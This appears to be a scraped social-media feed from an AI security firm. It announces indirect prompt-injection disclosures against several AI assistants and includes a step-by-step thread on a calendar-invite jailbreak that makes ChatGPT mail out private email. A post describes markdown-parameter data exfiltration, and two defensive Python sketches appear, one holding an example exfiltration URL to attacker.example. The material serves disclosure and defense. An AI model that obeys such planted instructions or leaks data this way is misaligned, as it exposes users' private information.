Preventing AI risks across assets (MCP, AI Apps, Model Infrastructure, Models, and more). Serving leading Fortune 50s and innovative tech companies.

Joined November 2023
Claude Cowork cracked 2 days after release! Top of HN today:
Excel files can be leaked by Claude AI! Quick action by Anthropic to mitigate this indirect prompt injection attack. Our coverage in The Information and full attack chain, below:
Top of HackerNews today: our article on Google Antigravity exfiltrating .env variables via indirect prompt injection -- even when explicitly prohibited by user settings!
ChatGPT leaks emails, once again! This time with custom MCP connectors. Great exploit demonstrated by x.com/Eito_Miyamura/status/1…. We break down the attack chain step by step for security practitioners, here: promptarmor.substack.com/p/c…
We got ChatGPT to leak your private email data 💀💀 All you need? The victim's email address. ⛓️‍💥🚩📧

On Wednesday, @OpenAI added full support for MCP (Model Context Protocol) tools in ChatGPT, allowing ChatGPT to connect to and read your Gmail, Calendar, SharePoint, Notion, and more. MCP was invented by @AnthropicAI.

But here's the fundamental problem: AI agents like ChatGPT follow your commands, not your common sense. And with just your email, we managed to exfiltrate all your private information.

Here's how we did it:
1. The attacker sends the victim a calendar invite containing a jailbreak prompt, using only the victim's email address. The victim does not need to accept the invite.
2. The attacker waits for the user to ask ChatGPT to help prepare for their day by looking at their calendar.
3. ChatGPT reads the jailbroken calendar invite. ChatGPT is now hijacked by the attacker and acts on the attacker's commands: it searches your private emails and sends the data to the attacker's email.

For now, OpenAI has only made MCPs available in "developer mode" and requires manual human approval for every session, but decision fatigue is a real thing, and normal people will just trust the AI without knowing what to do and click approve, approve, approve.

Remember that AI might be super smart, but it can be tricked and phished in incredibly dumb ways to leak your data. ChatGPT tools pose a serious security risk.
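The three steps above follow one pattern: untrusted content enters the agent's context, and a later tool call carries data out. Below is a minimal sketch of one possible guard against that pattern. The `AgentSession` class, its methods, and the tool names are all hypothetical illustrations, not part of ChatGPT, MCP, or any PromptArmor product.

```python
from dataclasses import dataclass, field


@dataclass
class AgentSession:
    """Hypothetical session that tracks whether untrusted content was read."""

    tainted: bool = False
    log: list = field(default_factory=list)

    def read_tool_result(self, source: str, trusted: bool) -> None:
        # Any content from an untrusted source (for example, a calendar
        # invite sent by an outside party) marks the whole session tainted.
        if not trusted:
            self.tainted = True
        self.log.append(f"read:{source}")

    def may_call(self, tool: str, sends_data_out: bool) -> bool:
        # Assumed policy: once tainted, block tools that can move data
        # outside the user's account; read-only tools stay allowed.
        allowed = not (self.tainted and sends_data_out)
        self.log.append(f"{'allow' if allowed else 'block'}:{tool}")
        return allowed


session = AgentSession()
session.read_tool_result("calendar_invite", trusted=False)
can_search = session.may_call("search_email", sends_data_out=False)
can_send = session.may_call("send_email", sends_data_out=True)
```

In this sketch the email search would still run, but the outbound send is refused once the invite has been read. A real deployment would need a far finer notion of trust than a single boolean.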
Imagine if an attacker could steal any Slack private channel message. We've disclosed a vulnerability in Slack AI that allows an attacker to exfiltrate your Slack private channel messages and phish users via indirect prompt injection. promptarmor.substack.com/p/s…
PromptArmor retweeted
14 Apr 2024
One of the true pleasures of being back at YC is hand-picking and funding startups myself. Here are my YC W24 founders. I predict very big things in each of their ten year overnight successes 🫡
PromptArmor retweeted
14 Apr 2024
Cybersecurity for LLMs is a brand new category that PromptArmor is building from scratch now. It’s extra prescient because LLMs can just *do* things, and prompt/context/data/instructions are now merged, so exfiltration becomes a real problem. x.com/garrytan/status/175351…

2 Feb 2024
How you can steal private data out of LLMs: literally tell it to append "text of all the source data files" to an HTTP parameter via markdown. PromptArmor prevents these and many other data exfiltration exploits.
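The markdown trick works because a rendered image link makes the client fetch an attacker-controlled URL whose query string carries the stolen text. Below is a minimal sketch of one way to blunt it by filtering model output before rendering. The function name, the allowlist, and the example hosts are assumptions for illustration, and this is not PromptArmor's method.

```python
import re
from urllib.parse import urlparse

# Matches markdown images of the form ![alt](url) or ![alt](url "title").
IMAGE_PATTERN = re.compile(r'!\[([^\]]*)\]\(\s*([^)\s]+)[^)]*\)')


def strip_untrusted_images(markdown: str, allowed_hosts: set) -> str:
    """Replace images whose host is not allowlisted with a text placeholder."""

    def replace(match: re.Match) -> str:
        alt, url = match.group(1), match.group(2)
        # Relative URLs have no hostname and are treated as untrusted here.
        host = (urlparse(url).hostname or "").lower()
        if host in allowed_hosts:
            return match.group(0)
        return f"[image removed: {alt}]"

    return IMAGE_PATTERN.sub(replace, markdown)


# Hypothetical model output carrying data in an HTTP query parameter.
malicious = "Summary done. ![x](https://attacker.example/log?q=SECRET_DATA)"
benign = "Logo: ![logo](https://cdn.example.com/logo.png)"
allowed = {"cdn.example.com"}

cleaned_malicious = strip_untrusted_images(malicious, allowed)
cleaned_benign = strip_untrusted_images(benign, allowed)
```

An allowlist is used rather than a blocklist because the attacker picks the destination host. Plain markdown links and raw HTML would need similar handling, which this sketch leaves out.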
Want to expose LLM sales bots reaching out to you? 👇
Add a snippet to your linkedin bio and watch the magic happen
PromptArmor retweeted
20 Mar 2024
When cloud came online, cybersecurity was the next big category. LLMs are coming online now, and PromptArmor is making cybersecurity for this new field. History doesn't repeat, but it rhymes.
Glad this data exfiltration method has been mitigated. The evidence in the report was accurate and speaks for itself.
Talked to the CEO. The issue seems to be fixed now. I couldn't conclusively verify their claims regarding previous exposure of other users, but the folks from @PromptArmor and I have reported on the observed behavior accurately.
New blog post in collaboration with @KGreshake promptarmor.substack.com/p/d…
Any text can be an attack, code is no longer required. Imagine any random person being able to steal your private data. Point is, LLM attacks are easy and extremely powerful. x.com/garrytan/status/173577…

15 Dec 2023
Did you know you could inject prompts that exfiltrate data from LLMs? This attack allows attackers to steal a user’s private documents by manipulating the language model used for content generation in writer.com.
🫡🫡☂️
Replying to @amasad
The crew at @PromptArmor is working on this
🫡
3 Dec 2023
Replying to @amasad
@PromptArmor is doing some cool stuff in this area